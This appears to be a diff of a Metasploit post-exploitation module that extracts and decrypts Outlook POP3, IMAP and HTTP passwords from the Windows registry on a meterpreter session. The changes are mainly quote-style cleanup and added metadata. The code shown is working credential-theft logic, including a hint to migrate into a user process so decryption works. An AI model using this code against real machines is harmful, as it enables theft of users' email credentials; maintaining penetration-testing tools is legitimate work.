@@ -27,6 +27,11 @@ class MetasploitModule < Msf::Post
         'Author' => [ 'Justin Cacak' ], # Updated to work with newer versions of Outlook (2013, 2016, Office 365)
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -58,19 +63,19 @@ class MetasploitModule < Msf::Post
     mem = process.memory.allocate(128)
     process.memory.write(mem, data)
 
-    if session.sys.process.each_process.find { |i| i["pid"] == pid } ["arch"] == "x86"
-      addr = [mem].pack("V")
-      len = [data.length].pack("V")
+    if session.sys.process.each_process.find { |i| i['pid'] == pid } ['arch'] == 'x86'
+      addr = [mem].pack('V')
+      len = [data.length].pack('V')
       ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
-      len, addr = ret["pDataOut"].unpack("V2")
+      len, addr = ret['pDataOut'].unpack('V2')
     else
-      addr = [mem].pack("Q")
-      len = [data.length].pack("Q")
+      addr = [mem].pack('Q')
+      len = [data.length].pack('Q')
       ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
-      len, addr = ret["pDataOut"].unpack("Q2")
+      len, addr = ret['pDataOut'].unpack('Q2')
     end
 
-    return "" if len == 0
+    return '' if len == 0
 
     decrypted_pw = process.memory.read(addr, len)
     return decrypted_pw
@@ -88,18 +93,18 @@ class MetasploitModule < Msf::Post
 
     # Check for registry key based on Outlook version pulled from registry
     @key_base = "HKCU\\Software\\Microsoft\\Office\\#{outlook_ver}.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
-    next_account_id = get_valdata("", 'NextAccountID')
+    next_account_id = get_valdata('', 'NextAccountID')
 
     # Default to original registry key for module
     if next_account_id.nil?
-      @key_base = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
-      next_account_id = get_valdata("", 'NextAccountID')
+      @key_base = 'HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676'
+      next_account_id = get_valdata('', 'NextAccountID')
     end
 
     if !next_account_id.nil?
       # Microsoft Outlook not found
 
-      print_status "Microsoft Outlook found in Registry..."
+      print_status 'Microsoft Outlook found in Registry...'
       outlook_exists = 1
       registry_enumkeys(@key_base).each do |k|
         display_name = get_valdata(k, 'Display Name')
@@ -127,22 +132,22 @@ class MetasploitModule < Msf::Post
         end
 
         if !pop3_server.nil?
-          type = "POP3"
+          type = 'POP3'
         elsif !http_server_url.nil?
-          type = "HTTP"
+          type = 'HTTP'
         elsif !imap_server.nil?
-          type = "IMAP"
+          type = 'IMAP'
         else
-          type = "UNKNOWN"
+          type = 'UNKNOWN'
         end
 
         # Decrypt password and output results.  Need to do each separately due to the way Microsoft stores them.
-        print_good("Account Found:")
+        print_good('Account Found:')
         print_status("     Type: #{type}")
         print_status("     User Display Name: #{displayname}")
         print_status("     User Email Address: #{email}")
 
-        if type == "POP3"
+        if type == 'POP3'
           pop3_pw = get_valdata(k, 'POP3 Password')
           pop3_user = get_valdata(k, 'POP3 User')
           pop3_use_spa = get_valdata(k, 'POP3 Use SPA')
@@ -150,7 +155,7 @@ class MetasploitModule < Msf::Post
 
           print_status("     User Name: #{pop3_user}")
           if pop3_pw.nil?
-            print_status("     User Password: <not stored>")
+            print_status('     User Password: <not stored>')
           else
             pop3_pw.slice!(0, 1)
             pass = decrypt_password(pop3_pw)
@@ -162,21 +167,21 @@ class MetasploitModule < Msf::Post
           end
 
           if !pop3_use_spa.nil? # Account for SPA (NTLM auth)
-            print_status("     Secure Password Authentication (SPA): Enabled")
+            print_status('     Secure Password Authentication (SPA): Enabled')
           end
 
           print_status("     Incoming Mail Server (POP3): #{pop3_server}")
 
           pop3_use_ssl = get_valdata(k, 'POP3 Use SSL')
           if pop3_use_ssl.nil?
-            print_status("     POP3 Use SSL: No")
+            print_status('     POP3 Use SSL: No')
           else
-            print_status("     POP3 Use SSL: Yes")
+            print_status('     POP3 Use SSL: Yes')
           end
 
           pop3_port = get_valdata(k, 'POP3 Port')
           if pop3_port.nil?
-            print_status("     POP3 Port: 110")
+            print_status('     POP3 Port: 110')
             portnum = 110
           else
             print_status("     POP3 Port: #{pop3_port}")
@@ -201,26 +206,26 @@ class MetasploitModule < Msf::Post
 
           smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
           if smtp_use_ssl.nil?
-            print_status("     SMTP Use SSL: No")
+            print_status('     SMTP Use SSL: No')
           else
-            print_status("     SMTP Use SSL: Yes")
+            print_status('     SMTP Use SSL: Yes')
           end
 
           if smtp_port.nil?
-            print_status("     SMTP Port: 25")
+            print_status('     SMTP Port: 25')
             smtp_port = 25
           else
             print_status("     SMTP Port: #{smtp_port}")
           end
 
-        elsif type == "HTTP"
+        elsif type == 'HTTP'
           http_password = get_valdata(k, 'HTTP Password')
           http_user = get_valdata(k, 'HTTP User')
           http_use_spa = get_valdata(k, 'HTTP Use SPA')
 
           print_status("     User Name: #{http_user}")
           if http_password.nil?
-            print_status("     User Password: <not stored>")
+            print_status('     User Password: <not stored>')
           else
             http_password.slice!(0, 1)
             pass = decrypt_password(http_password)
@@ -239,12 +244,12 @@ class MetasploitModule < Msf::Post
           end
 
           if !http_use_spa.nil? # Account for SPA (NTLM auth)
-            print_status("     Secure Password Authentication (SPA): Enabled")
+            print_status('     Secure Password Authentication (SPA): Enabled')
           end
 
           print_status("     HTTP Server URL: #{http_server_url}")
 
-        elsif type == "IMAP"
+        elsif type == 'IMAP'
           imap_user = get_valdata(k, 'IMAP User')
           imap_use_spa = get_valdata(k, 'IMAP Use SPA')
           imap_password = get_valdata(k, 'IMAP Password')
@@ -252,7 +257,7 @@ class MetasploitModule < Msf::Post
 
           print_status("     User Name: #{imap_user}")
           if imap_password.nil?
-            print_status("     User Password: <not stored>")
+            print_status('     User Password: <not stored>')
           else
             imap_password.slice!(0, 1)
             pass = decrypt_password(imap_password)
@@ -263,21 +268,21 @@ class MetasploitModule < Msf::Post
           end
 
           if !imap_use_spa.nil? # Account for SPA (NTLM auth)
-            print_status("     Secure Password Authentication (SPA): Enabled")
+            print_status('     Secure Password Authentication (SPA): Enabled')
           end
 
           print_status("     Incoming Mail Server (IMAP): #{imap_server}")
 
           imap_use_ssl = get_valdata(k, 'IMAP Use SSL')
           if imap_use_ssl.nil?
-            print_status("     IMAP Use SSL: No")
+            print_status('     IMAP Use SSL: No')
           else
-            print_status("     IMAP Use SSL: Yes")
+            print_status('     IMAP Use SSL: Yes')
           end
 
           imap_port = get_valdata(k, 'IMAP Port')
           if imap_port.nil?
-            print_status("     IMAP Port: 143")
+            print_status('     IMAP Port: 143')
             portnum = 143
           else
             print_status("     IMAP Port: #{imap_port}")
@@ -302,13 +307,13 @@ class MetasploitModule < Msf::Post
 
           smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
           if smtp_use_ssl.nil?
-            print_status("     SMTP Use SSL: No")
+            print_status('     SMTP Use SSL: No')
           else
-            print_status("     SMTP Use SSL: Yes")
+            print_status('     SMTP Use SSL: Yes')
           end
 
           if smtp_port.nil?
-            print_status("     SMTP Port: 25")
+            print_status('     SMTP Port: 25')
             smtp_port = 25
           else
             print_status("     SMTP Port: #{smtp_port}")
@@ -320,7 +325,7 @@ class MetasploitModule < Msf::Post
           service_data = {
             address: Rex::Socket.getaddress(host),
             port: portnum,
-            protocol: "tcp",
+            protocol: 'tcp',
             service_name: type,
             workspace_id: myworkspace_id
           }
@@ -338,7 +343,7 @@ class MetasploitModule < Msf::Post
 
           login_data = {
             core: credential_core,
-            access_level: "User",
+            access_level: 'User',
             status: Metasploit::Model::Login::Status::UNTRIED
           }
 
@@ -349,8 +354,8 @@ class MetasploitModule < Msf::Post
           service_data = {
             address: Rex::Socket.getaddress(smtp_server),
             port: smtp_port,
-            protocol: "tcp",
-            service_name: "smtp",
+            protocol: 'tcp',
+            service_name: 'smtp',
             workspace_id: myworkspace_id
           }
 
@@ -367,36 +372,36 @@ class MetasploitModule < Msf::Post
 
           login_data = {
             core: credential_core,
-            access_level: "User",
+            access_level: 'User',
             status: Metasploit::Model::Login::Status::UNTRIED
           }
 
           create_credential_login(login_data.merge(service_data))
         end
 
-        print_status("")
+        print_status('')
       end
     end
 
     if outlook_exists == 0
-      print_status("Microsoft Outlook not installed or Exchange accounts are being used.")
+      print_status('Microsoft Outlook not installed or Exchange accounts are being used.')
     elsif saved_accounts == 0
-      print_status("Microsoft Outlook installed however no accounts stored in Registry.")
+      print_status('Microsoft Outlook installed however no accounts stored in Registry.')
     end
   end
 
   def outlook_version
-    val = registry_getvaldata("HKCR\\Outlook.Application\\CurVer", "")
+    val = registry_getvaldata('HKCR\\Outlook.Application\\CurVer', '')
     if !val.nil?
-      idx = val.rindex(".")
-      val[idx + 1..-1]
+      idx = val.rindex('.')
+      val[idx + 1..]
     end
   end
 
   def run
     # Get Outlook version from registry
     outlook_ver = outlook_version
-    fail_with(Failure::NotFound, "Microsoft Outlook version not found in registry.") if outlook_ver.nil?
+    fail_with(Failure::NotFound, 'Microsoft Outlook version not found in registry.') if outlook_ver.nil?
 
     print_status("Microsoft Outlook Version: #{outlook_ver}")
     uid = session.sys.config.getuid # Get uid.  Decryption will only work if executed under the same user account as the password was encrypted.
@@ -404,14 +409,14 @@ class MetasploitModule < Msf::Post
 
     if is_system?
       print_error("This module is running under #{uid}.")
-      print_error("Automatic decryption will not be possible.")
-      print_error("Migrate to a user process to achieve successful decryption (e.g. explorer.exe).")
+      print_error('Automatic decryption will not be possible.')
+      print_error('Migrate to a user process to achieve successful decryption (e.g. explorer.exe).')
     else
-      print_status("Searching for Microsoft Outlook in Registry...")
+      print_status('Searching for Microsoft Outlook in Registry...')
       prepare_railgun
       get_registry(outlook_ver)
     end
 
-    print_status("Complete")
+    print_status('Complete')
   end
 end
